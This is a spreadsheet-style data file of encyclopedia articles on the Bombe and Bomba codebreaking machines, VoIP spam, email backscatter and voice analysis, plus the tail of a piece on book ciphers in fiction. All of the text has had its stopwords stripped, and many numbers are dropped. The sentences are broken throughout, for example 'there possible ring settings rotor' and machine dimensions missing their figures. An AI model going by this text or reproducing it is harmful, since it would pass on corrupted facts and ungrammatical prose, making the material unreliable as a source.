historical mystery iain pears, book cipher conceals character's family history relationship english civil war. john carre's perfect spy, protagonist magnus uses book cipher based german text simplicissimus. movie manhunter, hannibal lecter, prison, communicates personal newspaper using book code police know says mentions verses bible, chapter numbers valid.) police later discover book lecter actually using, given home address profiler, will graham, warned kill graham. darwin code welch, jess uses shakespearean speech construct book cipher communicate enemy ally. bitterblue kristin cashore, bitterblue uses book(?) code unlock secrets father's reign king. series deutschland protagonist martin rauch's east german handlers book cipher communicate undercover west germany. also running cipher codebook references</t>
  </si>
  <si>
    <t>Bombe</t>
  </si>
  <si>
    <t>bombe (uk: electro-mechanical device used british cryptologists help decipher german enigma-machine-encrypted secret messages world navy army later produced machines functional specification, albeit engineered differently polish british bombes. british bombe developed device known "bomba" (polish: bomba kryptologiczna), designed poland biuro szyfrów (cipher bureau) cryptologist marian rejewski, breaking german enigma messages previous seven years, using earlier machines. initial design british bombe produced 1939 government code cypher school (gc&amp;cs) bletchley park alan turing, important refinement devised 1940 gordon welchman. engineering design construction work harold keen british tabulating machine company. first bombe, code-named victory, installed march 1940 second version, agnus agnes, incorporating welchman's design, working august 1940.the bombe designed discover daily settings enigma machines various german military networks: specifically, rotors positions machine; rotor core start positions message—the message key—and wirings plugboard. enigma machine enigma electro-mechanical rotor machine used encryption decryption secret messages. developed germany 1920s. repeated changes electrical pathway keyboard lampboard implement polyalphabetic substitution cipher, turns plaintext ciphertext back again. enigma's scrambler contains rotors electrical contacts side, whose wiring diverts current different position sides. when pressed keyboard, electric current flows entry drum right-hand scrambler, rotors reflecting drum reflector) turns back rotors entry drum, illuminate lamps lampboard.at depression, right-hand "fast" rotor advances position, causes encipherment change. addition, rotation, right-hand rotor causes middle rotor advance; middle rotor similarly causes left-hand "slow") rotor advance. each rotor's position indicated letter alphabet showing window. enigma operator rotates wheels hand start position enciphering deciphering message. three-letter sequence indicating start position rotors "message key". there 17,576 different message keys different positions three rotors. opening machine releasing compression bar, three rotors spindle removed machine sequence (called "wheel order" bletchley park) altered. multiplying 17,576 possible wheel orders gives 105,456 different ways scrambler although 105,456 large number, guarantee security. brute-force attack possible: could imagine using code clerks tried decode message using 1000 distinct rotor settings. poles developed card catalogs could easily find rotor positions; britain built "eins" common german word, meaning number one) catalogs. less intensive methods also possible. message traffic used rotor starting position, frequency analysis position could recover polyalphabetic substitutions. different rotor starting positions used, overlapping portions message could found using index coincidence. many major powers (including germans) could break enigma traffic knew rotor wiring. german military knew enigma weak.in 1930, german army introduced additional security feature, plugboard (steckerbrett german; plug stecker, british cryptologists also used word) scrambled letters. enigma encryption self-inverse function, meaning substitutes letters reciprocally: transformed transformed plugboard transformation maintained self-inverse quality, plugboard wiring, unlike rotor positions, change encryption. this regularity exploited welchman's "diagonal board" enhancement bombe, vastly increased efficiency. with plug leads (leaving letters "unsteckered"), 100,391,791,500 possible ways setting plugboard.an important feature machine cryptanalyst's point view, indeed enigma's achilles' heel, reflector scrambler prevented letter enciphered itself. putative solution gave, location, letter proposed plaintext ciphertext could therefore eliminated.in lead-up world germans made successive improvements military enigma machines. january 1939, additional rotors introduced three rotors chosen five (hence possible wheel orders) army force enigmas, three eight (making possible wheel orders) navy machines. addition, leads used plugboard, leaving letters unsteckered. this meant force army enigmas could 1.5×1019 ways. 1941 german navy introduced version enigma rotatable reflector (the four-rotor enigma) communicating u-boats. this could 1.8×1020 different ways. four-rotor enigma late 1941 change german navy fortunes battle atlantic, combined intelligence reports, convinced admiral karl dönitz allies able read german navy's coded communications, fourth rotor unknown wiring added german navy enigmas used u-boat communications, producing triton system, known bletchley park shark. this coupled thinner reflector design make room extra rotor. triton designed remained compatible three-rotor machines necessary: extra 'fourth' rotors, 'beta', designed paired thin reflector, rotor ring 'a', pair acted reflector coupled three rotors. fortunately allies, december 1941, machine went official service, submarine accidentally sent message fourth rotor wrong position, retransmitted message rotor correct position emulate three-rotor machine. february 1942 change number rotors used became official, allies' ability read german submarines' messages ceased snatch captured u-boat revealed four-rotor machine's ability emulate three-rotor machine, also fourth rotor move message. this along aforementioned retransmission eventually allowed code breakers figure wiring 'beta' 'gamma' fourth rotors.the first half 1942 "second happy time" german u-boats, renewed success attacking allied shipping. this security enigma germans' ability read allied convoy messages sent naval cipher between january march 1942, german submarines sank ships east coast. 1942 began using convoy system requiring blackout coastal cities ships would silhouetted lights, yielded slightly improved security allied shipping. allies' failure change cipher three months, together fact allied messages never contained enigma decrypts even mentioned decrypting messages), helped convince germans messages secure. conversely, allies learned germans broken naval cipher almost immediately enigma decrypts, lost many ships delay changing cipher. principle bombe following settings enigma machine must discovered decipher german military enigma messages. once known, messages network pair days case german navy) could decrypted. internal settings (that required enigma machine opened) selection rotors enigma's scrambler, positions spindle (walzenlage "wheel order"). possible wheel orders numbered (three rotors choice five) army force networks (three rotors choice eight) naval networks. positions alphabet rings' turnover notch relation core rotor (ringstellung "ring settings"). there possible ring settings rotor.external settings (that could changed without opening enigma machine) plugboard connections (steckerverbindungen "stecker values"). leads could arranged {\displaystyle {\frac {{26 \choose 2}\cdot \choose 2}\cdot \choose 2}\cdot \dots \cdot \choose 2}}{10!}}=150\,738\,274\,937\,250} different combinations (approximately trillion). scrambler rotor positions start enciphering message (the grundstellung "indicator-setting") 1940; thereafter initial positions rotor start enciphering message (the "message key") indicator-setting could derived. there 17576 possible three-letter keys.the bombe identified possible initial positions rotor cores stecker partner specified letter wheel orders. manual techniques used complete decryption process. words gordon welchman, "... task bombe simply reduce assumptions wheel order scrambler positions required 'further analysis' manageable number". structure bombe electro-mechanical device replicated action several enigma machines wired together. standard german enigma employed, time, three rotors, could positions. standard british bombe contained enigma equivalents, three drums wired produce scrambling effect enigma rotors. bombe could three jobs simultaneously. each would menu number different wheel orders. menu contained fewer letters, three different wheel orders could bombe; letters, two. order simulate enigma rotors, rotor drum bombe complete sets contacts, input towards reflector output reflector, reflected signal could pass back separate contacts. each drum wire brushes, made contact plate onto loaded. brushes corresponding contacts plate arranged four concentric circles outer pair circles (input output) equivalent current enigma passing direction scrambler, inner pair equivalent current flowing opposite direction. interconnections within drums sets input output contacts identical relevant enigma rotor. there permanent wiring inner sets contacts three input/output plates. from there, circuit continued plugboard located left-hand panel, wired imitate enigma reflector back outer pair contacts. "double-ended enigma", sockets back machine, 26-way cables could plugged. bombe drums arranged three simulating left-hand rotor enigma scrambler, middle middle rotor, bottom right-hand rotor. drums driven synchrony electric motor. full rotation drums, middle drums incremented position, likewise middle bottom drums, giving total 17576 positions 3-rotor enigma scrambler.the drums colour-coded according enigma rotor emulated: red; maroon; green; yellow; brown; cobalt (blue); (black); viii silver.at position rotors, electric current would would flow wires, would tested bombe's comparator unit. large number positions, test would lead logical contradiction, ruling setting. test lead contradiction, machine would stop. operator would record candidate solution reading positions indicator drums indicator unit bombe's right-hand panel. operator restarted run. candidate solutions, stops called, processed eliminate many false stops possible. typically, many false bombe stops correct found. candidate solutions wheel orders subject extensive cryptanalytical work. this progressively eliminated false stops, built plugboard connections established positions rotor alphabet rings. eventually, result would tested typex machine modified replicate enigma, whether decryption produced german language. bombe menu bombe involved cryptanalyst first obtaining crib section plaintext thought correspond ciphertext. finding cribs straightforward; required considerable familiarity german military jargon communication habits operators. however, codebreakers aided fact enigma would never encrypt letter itself. this helped testing possible crib ciphertext, could rule number cribs positions, letter occurred position plaintext ciphertext. this termed crash bletchley park. once suitable crib decided upon, cryptanalyst would produce menu wiring bombe test crib ciphertext. following simplified explanation process constructing menu. suppose crib attackatdawn tested certain stretch ciphertext, say, wsnpnlklstcs. letters crib ciphertext compared establish pairings ciphertext crib plaintext. these graphed diagram. borne mind relationships reciprocal plaintext associated ciphertext plaintext associated ciphertext. position plaintext-ciphertext comparison, letter associated also associated position position position building relationships diagram provided menu bombe connections drum start positions would illustration, three sequences letters form loops cycles closures), atlk, tawcn. loops menu, candidate rotor settings bombe could reject, hence fewer false stops. alan turing conducted substantial analysis (without electronic aids) estimate many bombe stops would expected according number letters menu number loops. some results given following table. recent bombe simulations shown similar results. stecker values german military enigma included plugboard (steckerbrett german) swapped letters (indicated main scrambler's change (indicated plugboard connections known cryptanalysts stecker values. plugboard, would relatively straightforward test rotor setting; typex machine modified replicate enigma could crib letter encrypted compared ciphertext, matched, next letter would tried, checking encrypted entire length crib. point letters failed match, initial rotor setting would rejected; incorrect settings would ruled testing letters. this test could readily mechanised applied 17576 settings rotors. however, plugboard, much harder perform trial encryptions unknown crib ciphertext letters transformed plugboard. example, first position, p(a) p(w) unknown plugboard settings unknown. turing's solution working stecker values (plugboard connections) note that, even though values for, say, p(a) p(w), unknown, crib still provided known relationships amongst values; values plugboard transformation. using relationships, cryptanalyst could reason another and, potentially, derive logical contradiction, case rotor setting consideration could ruled out. worked example reasoning might follows: cryptanalyst might suppose p(a) looking position crib:ciphertext comparison, observe encrypts expressed formula: p(s10(p(a)))due function inverse, apply sides equation obtain following: p(t) s10(p(a))this gives relationship p(a) p(t). p(a) rotor setting consideration s10(y) (say), deduce p(t) s10(p(a)) s10(y) qwhile crib allow determine values plugboard are, provide constraint them. case, shows p(t) completely determined p(a) known. likewise, also observe encrypts position using deduce steckered value well using similar argument, get, say, p(l) s8(p(t)) s8(q) gsimilarly, position encrypts enigma machine self-reciprocal, means position would also encrypt knowing this, apply argument deduce value p(k), might p(k) s6(p(l)) s6(g) fand again, sort reasoning applies position get: p(a) s7(p(k)) s7(f) nhowever, case, derived contradiction, since, hypothesis, assumed p(a) outset. this means initial assumption must incorrect, (for rotor setting) p(a) (this type argument termed reductio absurdum "proof contradiction"). cryptanalyst hypothesised plugboard interconnection bombe test. stecker values ring settings worked hand methods. automated deduction automate logical deductions, bombe took form electrical circuit. current flowed around circuit near-instantaneously, represented possible logical deductions could made position. form circuit, bombe used several sets enigma rotor stacks wired together according instructions given menu, derived crib. because enigma machine inputs outputs, replica enigma stacks connected using 26-way cables. addition, enigma stack rotor setting offset number places determined position crib; example, enigma stack corresponding fifth letter crib would four places corresponding first letter. practice practical bombes used several stacks rotors spinning together test multiple hypotheses possible setups enigma machine, order rotors stack. while turing's bombe worked theory, required impractically long cribs rule sufficiently large numbers settings. gordon welchman came using symmetry enigma stecker increase power bombe. suggestion attachment called diagonal board improved bombe's effectiveness. british bombe polish cryptologic bomba (polish: bomba kryptologiczna; plural bomby) useful long three conditions met. first, form indicator include repetition message key; second, number rotors available limited three, giving different "wheel orders" (the three rotors order within machine); third, number plug-board leads remain relatively small majority letters unsteckered. machines built, possible rotor order. bomby delivered november 1938, barely month later germans introduced additional rotors loading enigma scrambler, increasing number wheel orders factor ten. building another bomby beyond poles' resources. also, january 1939, number plug-board leads increased ten. poles therefore return manual methods, zygalski sheets. alan turing designed british bombe general principle, assumption presence text, called crib, cryptanalysts could predict likely present defined point message. this technique termed known plaintext attack used limited extent poles, e.g., germans' "anx" "an", german "to", followed spacer. £100,000 budget construction turing's machine acquired contract build bombes awarded british tabulating machine company (btm) letchworth. placed project direction harold 'doc' keen. each machine feet (2.1 wide, feet inches (1.98 tall, feet (0.61 deep weighed ton. front bombe places drums could mounted. drums three groups triplets. each triplet, arranged vertically, corresponded three rotors enigma scrambler. bombe drums' input output contacts went cable connectors, allowing bombe wired according menu. 'fast' drum rotated speed 50.4 first models later ones, time 17,576 possible positions rotor order minutes.the first bombe named "victory". installed "hut bletchley park march 1940. based turing's original design lacked diagonal board. april 1940, griffin captured german trawler (schiff polares) flying dutch flag; included capture enigma keys april. bletchley retrospectively attacked messages sent period using captured material ingenious bombe menu enigma fast rotors position. june 1940, bletchley succeeded breaking days naval traffic, 22–27 april 1940. those messages first breaks kriegsmarine messages war, "[b]ut though success expanded naval section's knowledge kriegsmarines's signals organization, neither affected naval operations made naval enigma solutions possible." second bombe, named "agnus dei", later shortened "agnes", "aggie", equipped welchman's diagonal board, installed august 1940; "victory" later returned letchworth diagonal board fitted. bombes later moved "hut "hut 11". bombe referred group captain winterbotham "bronze goddess" colour. devices prosaically described operators "like great metal bookcases".during 1940, messages broken machines, nearly successfully. because danger bombes bletchley park lost bombing raid, bombe outstations established, adstock, gayhurst wavendon, buckinghamshire. june–august 1941 bombes bletchley park, wavendon completed, bletchley, adstock wavenden total bombes. when gayhurst became operational total bombes, expected total would increase bombes wrens (women's royal naval service). 1942 introduction naval four-rotor enigma, "far seventy bombes" would needed. outstations established stanmore eastcote, wavendon adstock bombes moved them, though gayhurst site retained. bombes left bletchley park used demonstration training purposes only. production bombes letchworth wartime conditions nowhere near rapid americans later achieved dayton, ohio. sergeant jones given overall responsibility bombe maintenance edward travis. later squadron leader confused eric jones, original bombe maintenance engineers, experienced techniques. welchman said later people tried maintain them, realised lucky him. about million delicate wire brushes drums make reliable contact terminals template. there brushes drum, drums bombe, ultimately around bombes.after world fifty bombes retained eastcote, rest destroyed. surviving bombes work, possibly eastern bloc ciphers. smith cites official history bombe saying "some machines stored away others required jobs sixteen machines kept comparatively busy menus." interesting note jobs came operating, checking times maintained faster best times periods." response four-rotor enigma program initiated bletchley park design much faster bombes could decrypt four-rotor system reasonable time. there streams development. one, code-named cobra, electronic sensing unit, produced charles wynn-williams telecommunications research establishment (tre) malvern tommy flowers general post office (gpo). other, code-named mammoth, designed harold keen btm, letchworth. initial delivery scheduled august september 1942. dual development projects created considerable tension teams, cast doubts viability opposing team's machine. after considerable internal rivalry dispute, gordon welchman then, bletchley park's assistant director mechanisation) forced step resolve situation. ultimately, cobra proved unreliable mammoth went full-scale production.unlike situation bletchley park, united states armed services share combined cryptanalytical service. indeed, considerable rivalry army's facility, signals intelligence service (sis), navy known op-20-g. before joined war, collaboration britain, albeit considerable amount caution britain's side extreme importance germany allies learning codes broken. despite worthwhile collaboration amongst cryptanalysts, superiors took time achieve trusting relationship british american bombes used mutual benefit. february 1941, captain sinkov lieutenant rosen army, naval lieutenants robert weeks prescott currier, arrived bletchley park bringing, amongst things, replica 'purple' cipher machine bletchley park's japanese section four returned america weeks, naval radio direction finding unit many documents including 'paper enigma'. currier later wrote:there complete cooperation. went everywhere, including watched entire operation techniques explained great detail. thoroughly briefed latest techniques solution enigma operations bombes. ample opportunity take many notes wanted watch first hand operations involved. main response four-rotor enigma navy bombe, manufactured much less constrained facilities available wartime britain. navy bombe colonel john tiltman, later became deputy director bletchley park, visited navy cryptanalysis office (op-20-g) april 1942 recognised america's vital interest deciphering u-boat traffic. urgent need, doubts british engineering workload slow progress, prompted start investigating designs navy bombe, based full blueprints wiring diagrams received naval lieutenants robert joseph eachus bletchley park july 1942. funding full, million, navy development effort requested september 1942 approved following day. commander edward travis, deputy director frank birch, head german naval section travelled bletchley park washington september 1942. with carl frederick holden, director naval communications established, october 1942, uk:us accord stronger claim brusa forerunner ukusa agreement," first agreement establish special sigint relationship countries," pattern ukusa, united states much senior partner alliance." established relationship "full collaboration" bletchley park op-20-g.an electronic solution problem fast bombe considered, rejected pragmatic reasons, contract national cash register corporation (ncr) dayton, ohio. this established united states naval computing machine laboratory. engineering development ncr's joseph desch. alan turing, written memorandum op-20-g (probably 1941), seconded british joint staff mission washington december 1942, exceptionally wide knowledge bombes methods use. asked look bombes built security certain speech cipher equipment development bell labs. visited op-20-g, went dayton december. able show necessary build bombes, possible rotor order, utilising techniques banburismus. initial order scaled machines. navy bombes used drums enigma rotors much british bombes. they eight enigma-equivalents front eight back. fast drum rotated 1,725 rpm, times speed early british bombes. 'stops' detected electronically using thermionic valves (vacuum tubes)—mostly thyratrons—for high-speed circuits. when 'stop' found machine over-ran slowed, reversed position found printed restarting. running time 4-rotor minutes, 3-rotor run, seconds. each machine feet (3.0 wide, feet (2.1 high, feet (0.61 deep weighed tons. first machine completed tested 1943. june, first machines, called 'adam' 'eve' broke particularly difficult german naval cipher, offizier settings june. mahon, joined naval section 1941, reported official 1945 "history eight 1939-1945":the american bombe essentials english bombe though functioned rather better handicapped make keen forced owing production difficulties, framework wheel machine. late autumn [1943] american machines coming action rate week, ultimate total region 125. these bombes faster, soon available, british bombes bletchley park outstations. consequently, well work. alexander's "cryptographic history work german naval enigma", wrote follows. when americans began turn bombes large numbers constant interchange signal cribs, keys, message texts, cryptographic chat this went cable first encyphered combined anglo-american cypher machine, c.c.m. most cribs operational urgency rapid efficient communication essential high standard reached this; emergency priority signal consisting long crib crib message text repeated safeguard corruption would take hour time began write signal completion decyphering result able bombes almost conveniently outstations miles away. viii para. production stopped september 1944 bombes made. last-manufactured navy bombe display national cryptologic museum. jack ingram, former curator museum, describes told existence second bombe searching finding whole. whether remains storage pieces, waiting discovered, longer exists, unknown. army bombe army bombe physically different british navy bombes. contract creation signed bell labs september 1942. machine designed analyse 3-rotor, 4-rotor traffic. known "003" "madame drums represent enigma rotors, using instead telephone-type relays. could, however, handle problem bombes drums could not. bombes consisted total enigma-equivalents, mounted rack approximately feet (2.1 long feet (2.4 high inches (150 wide. there control stations could allocate enigma-equivalents desired configuration means plugboards. rotor order changes require mechanical process changing drums, achieved half minute means push buttons. 3-rotor took minutes. bombe rebuild 1994 group john harper computer conservation society started project build working replica bombe. project required detailed research, took years effort replica completed, display bletchley park museum. march 2009 engineering heritage award. bombe rebuild relocated national museum computing bletchley park 2018, gallery officially re-opening june 2018. also cryptanalysis enigma colossus computer heath robinson jean valentine (bombe operator) notes references external links bombe simulator javascript) museum learning bombe: challenge four rotor enigma machine enigma turing bombe shaylor, april 1997. includes simulator java applet dayton codebreakers documentary navy's bombe; information desch, personnel naval computing machine laboratory. simulator turing navy bombes breaking german navy ciphers u534 enigma messages: cracked turing bombe software enigma cipher machines crypto museum.</t>
  </si>
  <si>
    <t>VoIP spam</t>
  </si>
  <si>
    <t>voip spam spit (spam internet telephony) unsolicited, automatically dialed telephone calls, typically using voice internet protocol (voip) technology.voip systems, like e-mail internet applications, susceptible abuse malicious parties initiate unsolicited unwanted communications, telemarketers prank callers. voip calling rates cheap, technology provides convenient, often free tools, asterisk applications. primary underlying technology driving threat session initiation protocol (sip), standard voip telecommunications. various techniques devised detect spam calls; take effect even recipient answered call disconnect these techniques rely statistical analysis features call, originating address, features signalling media messages. character voip spam characterized unsolicited calls initiated voice internet protocol systems. spammer attempts initiate voice session plays recorded message receiver answers. robocalls delivered automatically using telephony software, asterisk. mitigation 5039 contains basic methods mitigation telephony spam sip: whitelists blacklists consent-based communications reputation systems address obfuscation limited-use addresses turing tests, captchas, computational puzzles payment legal actionsa strong identification caller, example described 4474, helps mitigate spit. public switched telephone network (pstn), caller permits caller identification, least displayed caller spoofed. various spit mitigation methods frameworks proposed. vast amount work spam detection emails directly apply real-time nature voice calls. comprehensive survey voice security research (chapter provides overview. many proposals focus reputation behavior callers, focus machine learning classifiers using features extracted control signals data call. statistical analysis signaling traffic particular call frequency used detect anomalies, observe finally black-list suspicious callers. semi-supervised machine learning tool creates clusters similar calls human operator flag given cluster spam. voice spam detector (vsd) multi-stage spam filter based trust reputation. spider project proposes spit mitigation architecture, uses detection layer consisting various modules decision layer. voip seal system uses different stages. after signaling analysis first stage, suspicious callers subjected tests (e.g. audio-captchas) callee asked feedback later stages. symrank adapts pagerank algorithm computes reputation subscribers based incoming outgoing calls. furthermore, outliers total talk duration repetitive reciprocal calls used detect suspicious callers.spit detection make sophisticated machine learning algorithms, including semi-supervised machine learning algorithms. protocol called pmpck-means performs detection soon call established providing option automatically hanging suspect call. builds notion clustering whereby calls similar features placed cluster spit legitimate calls human input used mark cluster corresponds spit. call features include extracted directly signaling traffic source destination addresses, extracted media traffic, proportion silence, derived calls, duration frequency calls. spit detection mitigation also based solely caller's audio data. this approach uses audio identification techniques (similar music identification) detect calls identical audio data including certain degradations (e.g., noise different audio codecs). robust acoustic fingerprint (perceptual hashing) derived spectral parameters audio data replayed calls identified comparison fingerprints. prototype solution developed within viat project. researchers azad morla (2013) conducted study detecting spam callers much accurate secure approach. they invented scheme detect spam calls without user interaction prior reviewing content message. statistics several experiments showed system effectively detected spammers calling legitimate users without accessing private information user interaction. implementation mitigation little information available implementations spit mitigation measures telephone companies. some recent smartphone vendors incorporating notification possible spam incoming calls, google nexus android devices apple release. spit generally considered problem critical email spam. automated analysis call signaling flow help discover spit. commercial voip software communication service providers include behavioral analysis, e.g. acme packet palladion. relevant parameters indications spit are, example, high call attempt frequency, concurrent calls, call completion call duration average. references</t>
  </si>
  <si>
    <t>Backscatter (email)</t>
  </si>
  <si>
    <t>backscatter (also known outscatter, misdirected bounces, blowback collateral spam) incorrectly automated bounce messages sent mail servers, typically side effect incoming spam. recipients messages form unsolicited bulk email spam, solicited recipients, substantially similar other, delivered bulk quantities. systems generate email backscatter listed various email blacklists violation internet service providers' terms service. backscatter occurs worms spam messages often forge sender addresses. instead simply rejecting spam message, misconfigured mail server sends bounce message forged address. this normally happens mail server configured relay message after-queue processing step, example, antivirus scan spam check, fails, time antivirus scan spam check done, client already disconnected. cases, normally possible reject smtp transaction, since client would time waiting antivirus scan spam check finish. best thing case, silently drop message, rather risk creating backscatter. measures reduce problem include avoiding need bounce message rejections initial smtp connection stage; cases, sending bounce messages addresses reliably judged forged, cases sender cannot verified, thus ignoring message (i.e., dropping it). cause authors spam viruses wish make messages appear originate legitimate source fool recipients opening message, often web-crawling software scan usenet postings, message boards, pages legitimate email addresses. design smtp mail, recipient mail servers receiving forged messages simple, standard determine authenticity sender. accept email connection phases then, checking, refuse (e.g., software determines message likely spam), (potentially forged) sender's address attempt good-faith effort report problem apparent sender. mail servers handle undeliverable messages four fundamentally different ways: reject. receiving server reject incoming email connection stage sending server still connected. message rejected connect time error code, sending server report problem real sender cleanly. drop. receiving server initially accept full message, determine spam virus, delete automatically, sometimes rewriting final recipient "/dev/null" similar. this behavior used "spam score" email seriously high mail contains virus. 5321 says: "silent dropping messages considered cases high confidence messages seriously fraudulent otherwise inappropriate." quarantine. receiving server initially accept full message, determine spam, quarantine delivering "junk" "spam" folders eventually deleted automatically. this common behavior. bounce. receiving server initially accept full message, determine spam non-existent recipient, generate bounce message back supposed sender indicating message delivery failed.backscatter occurs "bounce" method used, sender information incoming email unrelated third party. reducing problem every step control worms spam messages helps reduce backscatter, common approaches, section, also reduce problem. connection-stage rejection during initial smtp connection, mailservers range checks, often reject email error code sending server still connected. rejecting message connection-stage usually cause sending generate local bounce message non-delivery notification (ndn) local, authenticated user.reasons rejection include: failed recipient validation failed anti-forgery checks spf, dkim sender servers forward-confirmed reverse entry senders block lists. temporary rejection greylisting methodsmail transfer agents (mtas) forward mail avoid generating backscatter using transparent smtp proxy. checking bounce recipients mail servers sending email bounce messages range measures judge whether return address forged. filtering backscatter while preventing backscatter desirable, also possible reduce impact filtering many spam filtering systems include option attempt detect reject backscatter email spam. addition, systems using schemes bounce address validation "tag" outgoing email allows reliably detect incoming bogus bounce messages. also references external links mail ddos attacks delivery messages (paper), techzoom, 2004. "backscatter", postfix (readme). "backscatter", spamlinks, archived original 2008-04-05. 3834: recommendations automatic responses electronic mail. "moronic mail autoresponders", from hell, iki. "why auto responders bad?", faq, spamcop. don't bounce spam: bounce spam. e-mail bouncebacks? you've been backscattered, world.</t>
  </si>
  <si>
    <t>Bomba (cryptography)</t>
  </si>
  <si>
    <t>bomba, bomba kryptologiczna (polish "bomb" "cryptologic bomb"), special-purpose machine designed around october 1938 polish cipher bureau cryptologist marian rejewski break german enigma-machine ciphers. etymology machine came called "bomb" object fascination speculation. theory, likely apocryphal, originated polish engineer army officer tadeusz lisicki (who knew rejewski colleague henryk zygalski wartime britain never associated cipher bureau). claimed jerzy różycki (the youngest three enigma cryptologists, died mediterranean passenger-ship sinking january 1942) named "bomb" ice-cream dessert name. this story seems implausible, since lisicki known różycki. rejewski stated device dubbed "bomb" "for lack better idea". perhaps credible explanation given cipher bureau technician, czesław betlewski: workers b.s.-4, cipher bureau's german section, christened machine "bomb" (also, alternatively, "washing machine" "mangle") characteristic muffled noise produced operating.a top-secret u.s. army report dated june 1945 stated: machine called "bombe" used expedite solution. first machine built poles hand operated multiple enigma machine. when possible solution reached part would fall machine onto floor loud noise. hence name "bombe".the u.s. army's description polish bomba vague inaccurate, clear device's description second paragraph "history" section, below: "each bomb... essentially constituted electrically powered aggregate enigmas..." determination solution involved disassembly part... fall[ing] off") device. background german enigma used combination control operation machine: rotor order, rotors install, ring setting rotor, initial setting rotor, settings stecker plugboard. rotor settings trigrams (for example, "njr") indicate operator machine. german enigma operators issued lists keys, day. added security, however, individual message encrypted using additional modification. operator randomly selected trigram rotor setting message (for example, "pdn"). this message would typed twice ("pdnpdn") encrypted, using daily (all rest settings). point operator would reset machine message key, would used rest message. because configuration enigma's rotor changed depression key, repetition would obvious ciphertext since plaintext letters would encrypt different ciphertext letters. (for example, "pdnpdn" might become "zrsjvl.") this procedure, seemed reasonably secure germans, nonetheless cryptographic malpractice, since first insights enigma encryption could inferred seeing character string encrypted differently times row. history using knowledge first three letters message second three, polish mathematician–cryptologist marian rejewski able determine internal wiring enigma machine thus reconstruct logical structure device. only general traits machine suspected, example commercial enigma variant, germans known using diplomatic communications. military versions sufficiently different present entirely problem. having done much, still necessary check potential daily keys break encrypted message (i.e., "ciphertext"). with many thousands possible keys, growing complexity enigma machine keying procedures, becoming increasingly daunting task. order mechanize speed process, rejewski, civilian mathematician working polish general staff's cipher bureau warsaw, invented "bomba kryptologiczna" (cryptologic bomb), probably october 1938. each bomb (six built warsaw cipher bureau september 1939) essentially constituted electrically powered aggregate enigmas took place hundred workers. bomb method based, like poles' earlier "grill" method, fact plug connections commutator ("plugboard") change letters. grill method required unchanged pairs letters, bomb method required unchanged letters. hence could applied even though number plug connections period five eight. mid-november 1938, bombs ready, reconstructing daily keys took hours.up july 1939, poles breaking enigma messages half years without telling french british allies. december 1938, rotors, introduced (three five rotors selected machine time). rejewski wrote 1979 critique appendix volume (1979), official history british intelligence second world war, quickly found [wirings] within [new rotors], [their] introduction [...] raised number possible sequences drums [...] hence also raised tenfold work finding keys. thus change qualitative quantitative. would markedly increase personnel operate bombs, produce perforated sheets series sheets needed, whereas meeting july 1939, series ready) manipulate sheets."harry hinsley suggested british intelligence... poles decided share enigma-breaking techniques equipment french british july 1939 encountered insuperable technical difficulties. rejewski rejected this: "no, [cryptologic] difficulties [...] prompted work british french, deteriorating political situation. difficulties would still, even shared achievements allies contribution struggle germany." also polish cipher bureau. bombe: machine, inspired rejewski's "cryptologic bomb", used british american cryptologists world decrypt german enigma ciphers. cryptanalysis enigma. zygalski sheets: device, invented october 1938 henryk zygalski called "perforated sheets" poles, made possible recovery enigma's entire cipher key. notes references władysław kozaczuk, enigma: german machine cipher broken, read allies world two, edited translated christopher kasparek, frederick, university publications america, 1984, isbn 0-89093-547-5. marian rejewski, "summary methods reconstructing enigma reconstructing daily keys, german efforts frustrate those methods," appendix władysław kozaczuk, enigma, 1984, 241–45. marian rejewski, "how polish mathematicians broke enigma," appendix władysław kozaczuk, enigma, 1984, 246–71. marian rejewski, "the mathematical solution enigma cipher," appendix władysław kozaczuk, enigma, 1984, 272–91. marian rejewski, "remarks appendix british intelligence second world f.h. hinsley", translated christopher kasparek, cryptologia: quarterly journal devoted aspects cryptology, vol. (january 1982), 75–83. marian rejewski, "how polish mathematicians deciphered enigma", annals history computing, vol. juli 1981, 213-234 6812 division bombe report eastcote 1944 external links codebreaking secret weapons world bill momsen online simulator bomba david link</t>
  </si>
  <si>
    <t>Voice analysis</t>
  </si>
  <si>
    <t>voice analysis study speech sounds purposes linguistic content, speech recognition. such studies include mostly medical analysis voice (phoniatrics), also speaker identification. more controversially, believe truthfulness emotional state speakers determined using voice stress analysis layered voice analysis. analysis methods voice problems require voice analysis commonly originate vocal folds laryngeal musculature controls them, since folds subject collision forces vibratory cycle drying forced small them, laryngeal musculature intensely active speech singing subject tiring. however, dynamic analysis vocal folds movement physically difficult. location vocal folds effectively prohibits direct, invasive measurement movement. less invasive imaging methods x-rays ultrasounds work vocal cords surrounded cartilage, distorts image quality. movements vocal cords rapid, fundamental frequencies usually thus preventing usage ordinary video. stroboscopic, high-speed videos provide option, vocal folds fiberoptic probe leading camera must positioned throat, makes speaking difficult. addition, placing objects pharynx usually triggers reflex stops voicing closes larynx. addition, stroboscopic imaging useful vocal fold vibratory pattern closely periodic. important indirect methods currently inverse filtering either microphone oral airflow recordings electroglottography (egg). inverse filtering, speech sound (the radiated acoustic pressure waveform, obtained microphone) oral airflow waveform circumferentially vented (cv) mask recorded outside mouth filtered mathematical method remove effects vocal tract. this method estimates glottal input voice production recording output using computational model invert effects vocal tract. kind noninvasive indirect indication vocal fold motion electroglottography, electrodes placed either side subject's throat level vocal folds record changes conductivity throat according large portion vocal folds touching other. thus yields one-dimensional information contact area. neither inverse filtering sufficient completely describe complex 3-dimensional pattern vocal fold movement, provide useful indirect evidence movement. another conduct voice analysis look voice characteristics. some characteristics voice phonation, pitch, loudness, rate. these characteristics used evaluate person's voice voice analysis process. phonation typically tested looking different types data collected person words long vowels, words many phonemes, typical speech. person's pitch evaluated making person produce highest lowest sounds can, well sounds between. keyboard used process. loudness valuable look certain people, loudness affects produce certain sounds. some people need speak louder certain phonemes comparison others produce them. this tested asking person amount loudness singing scale. rate also important looks fast slow person speaks. medicine medical study voice instance, analysis voice patients polyp removed vocal cords operation. computerized methods used assess issues objective manner. experienced voice therapist quite reliably evaluate voice, requires extensive training still subjective. another active research topic medical voice analysis vocal loading evaluation. vocal cords person speaks extended time suffer tiring—that process speaking exerts load vocal cords tires tissue. among professional voice users (e.g., teachers, sales people) tiring cause voice failures sick leaves. voice analysis studied objective means evaluate problems.voice analysis important factor study vocal cord paralysis. effects different functions vocal cords, speech breathing voice analysis used study effectiveness thyroplasty (medialization thyroplasty) improvements vocal cords surgery. traditional voice recording used pre-operation record voices chosen patients compared post-operation usage, along complex recordings using electroglottograpy, photoglottography, videokymography. medical professionals ability read understand results complex recordings, knowledge voice professional needed within 